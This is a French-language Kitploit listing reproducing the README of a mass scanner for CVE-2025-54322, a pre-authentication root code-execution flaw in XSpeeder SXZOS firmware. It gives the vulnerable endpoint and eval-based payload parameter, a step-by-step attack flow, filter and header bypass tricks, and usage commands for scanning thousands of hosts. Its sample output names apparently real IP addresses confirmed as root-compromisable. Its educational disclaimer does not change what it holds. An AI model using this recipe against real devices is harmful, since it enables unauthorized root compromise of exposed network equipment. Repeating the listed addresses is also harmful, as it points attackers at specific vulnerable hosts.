Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-54322 — CVE-2025-54322 - XSpeeder SXZOS Pre-Auth RCE 0day Finder Quick | Kitploit
Outils/GitHubGitHub/sachinart/cve-2025-54322
ReconnaissanceScanners de VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubsachinart/cve-2025-54322

CVE-2025-54322

CVE-2025-54322 - XSpeeder SXZOS Pre-Auth RCE 0day Finder Quick

Voir le dépôt
8210il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-54322 - Scanner RCE Pré-Auth XSpeeder SXZOS

License Python CVE

Un scanner de vulnérabilité multi-threadé pour CVE-2025-54322, une vulnérabilité d'exécution de code à distance non authentifiée dans le firmware XSpeeder SXZOS affectant environ 70 000+ hôtes dans le monde.

📋 Table des matières

  • À propos de la vulnérabilité
  • Fonctionnalités
  • Installation
  • Utilisation
  • Sortie
  • Avertissement
  • Crédits
  • Auteur

🔍 À propos de la vulnérabilité

CVE-2025-54322 est une vulnérabilité critique d'exécution de code à distance avant authentification découverte dans le firmware XSpeeder SXZOS, qui alimente les appareils SD-WAN, les routeurs et les équipements de périphérie réseau.

Détails de la vulnérabilité

  • ID CVE : CVE-2025-54322
  • Vendeur : XSpeeder (vendeur réseau chinois)
  • Produit affecté : Firmware SXZOS
  • Type de vulnérabilité : Exécution de code à distance avant authentification (RCE)
  • Score CVSS : 9.8+ (Critique)
  • Vecteur d'attaque : Réseau
  • Privilèges requis : Aucun
  • Interaction utilisateur : Aucune
  • Impact : Compromission complète du système avec privilèges root

Détails techniques

La vulnérabilité existe dans l'interface web basée sur Django du firmware SXZOS :

  1. Point de terminaison vulnérable : /?title=ABC&oIp=XXX&chkid=[payload_base64]
  2. Cause racine : Utilisation non sécurisée de la fonction eval() de Python sur une entrée utilisateur décodée en base64
  3. Authentification : Aucune requise (pré-auth)
  4. Contexte d'exécution : Privilèges root
  5. Hôtes affectés : ~70 000+ appareils accessibles publiquement dans le monde

Déroulement de l'attaque

1. Calculer un nonce basé sur le temps pour l'en-tête X-SXZ-R
2. Chauffer la session via le point de terminaison /webInfos/
3. Façonner une charge utile malveillante avec une chaîne de contournement (#sUserCodexsPwd)
4. Encoder la charge utile en base64
5. Envoyer l'exploit avec exactement 3 paramètres de requête
6. Le serveur décode et évalue la charge utile
7. Les commandes s'exécutent avec les privilèges root

Mécanismes de contournement

L'exploit contourne plusieurs couches de défense :

  • Vérification du User-Agent Nginx : Usurpé avec SXZ/2.3
  • Nonce temporel : En-tête calculé X-SXZ-R : [0-6]
  • Exigence de session : Chauffée via /webInfos/
  • Filtre de chaîne : Contourné avec le commentaire #sUserCodexsPwd
  • Nombre de paramètres : Maintient exactement 3 paramètres de requête

✨ Fonctionnalités

  • ✅ Scan multi-threadé - Test simultané de plusieurs cibles
  • ✅ Contournement SSL - Gère les certificats auto-signés et invalides
  • ✅ Logique de réessai intelligente - 2 tentatives par cible
  • ✅ Sortie propre - Affiche uniquement les hôtes vulnérables
  • ✅ Écriture en temps réel dans un fichier - Sauvegarde les résultats dans vuln-confirm.txt immédiatement
  • ✅ Suivi de progression - Mises à jour en direct toutes les 50 hôtes
  • ✅ Opérations thread-safe - Opérations concurrentes sécurisées sur fichier et console
  • ✅ Détection précise - Validation basée sur une expression régulière de l'exécution de commande
  • ✅ Logique conforme au PoC - Suit la méthodologie d'exploit originale

🚀 Installation

Prérequis

  • Python 3.7 ou supérieur
  • Gestionnaire de paquets pip

Configuration

# Cloner le dépôt
git clone https://github.com/Sachinart/CVE-2025-54322.git
cd CVE-2025-54322

# Installer les dépendances requises
pip install -r requirements.txt

Dépendances

Créez un fichier requirements.txt :

requests>=2.31.0
urllib3>=2.0.0

📖 Utilisation

Utilisation de base

python3 scanner.py targets.txt

Utilisation avancée

# Scanner avec un nombre de threads personnalisé (par défaut : 10)
python3 scanner.py targets.txt 20

# Scanner avec un maximum de threads pour des résultats plus rapides
python3 scanner.py targets.txt 50

# Scanner avec un nombre de threads conservateur
python3 scanner.py targets.txt 5

Format du fichier de cibles

Créez un fichier targets.txt avec une cible par ligne :

https://192.168.1.100:4433
https://10.0.0.50:8443
https://example.com:4433
http://vulnerable-device.local

Exemple de session

$ python3 scanner.py targets.txt 20

╔═══════════════════════════════════════════════════════════════╗
║     XSpeeder SXZOS (CVE-2025-54322) Scanner RCE              ║
║     Vérificateur de vulnérabilité RCE Root avant authentification ║
║     Affichage : HÔTES VULNÉRABLES UNIQUEMENT                 ║
╚═══════════════════════════════════════════════════════════════╝

[*] 2338 cibles chargées depuis targets.txt
[*] Utilisation de 20 threads simultanés
[*] Les hôtes vulnérables seront sauvegardés dans : vuln-confirm.txt
[*] Début du scan...

======================================================================
[+] VULNÉRABLE : https://27.40.80.93:4433
[+] Statut : VULNÉRABLE - RCE Confirmé
[+] Statut HTTP : 500
[+] Sortie : uid=0(root) gid=0(root)
======================================================================

[*] Progression : 50/2338 | Trouvé : 12 vulnérables
[*] Progression : 100/2338 | Trouvé : 24 vulnérables

======================================================================
[*] SCAN TERMINÉ
======================================================================
[*] Temps total : 890.45 secondes
[*] Total des cibles scannées : 2338
[*] Hôtes vulnérables trouvés : 156
[*] Taux de succès : 6.67%
======================================================================

📊 Sortie

Sortie console

Le scanner affiche :

  • Découvertes d'hôtes vulnérables en temps réel
  • Mises à jour de progression toutes les 50 hôtes
  • Résumé final avec statistiques
  • Résultats propres et organisés

Sortie fichier (vuln-confirm.txt)

XSpeeder SXZOS CVE-2025-54322 - Hôtes vulnérables
Scan démarré : 2025-12-27 15:30:45
======================================================================

https://27.40.80.93:4433
Statut : VULNÉRABLE - RCE Confirmé
Sortie : uid=0(root) gid=0(root)
----------------------------------------------------------------------
https://27.40.83.189:4433
Statut : VULNÉRABLE - RCE Confirmé
Sortie : uid=0(root) gid=0(root)
----------------------------------------------------------------------

======================================================================
Scan terminé : 2025-12-27 15:45:30
Total scanné : 2338
Vulnérables : 156
Temps écoulé : 890.45 secondes

🎯 Recommandations de threads

Nombre de ciblesThreads recommandésTemps estimé
1-105 threads~1-2 min
10-5010 threads~3-5 min
50-10020 threads~5-10 min
100-50030 threads~10-20 min
500+40-50 threads~20+ min

⚠️ Avertissement

Cet outil est fourni à des fins éducatives et de test de sécurité autorisé uniquement.

Avis légal

  • Testez uniquement les systèmes que vous possédez ou pour lesquels vous avez une autorisation écrite explicite
  • L'accès non autorisé à des systèmes informatiques est illégal dans la plupart des juridictions
  • L'auteur décline toute responsabilité en cas d'utilisation abusive de cet outil
  • En utilisant cet outil, vous acceptez de l'utiliser de manière responsable et éthique
  • Cet outil est destiné uniquement à la recherche en sécurité et aux tests d'intrusion

Divulgation responsable

Télécharger l’outil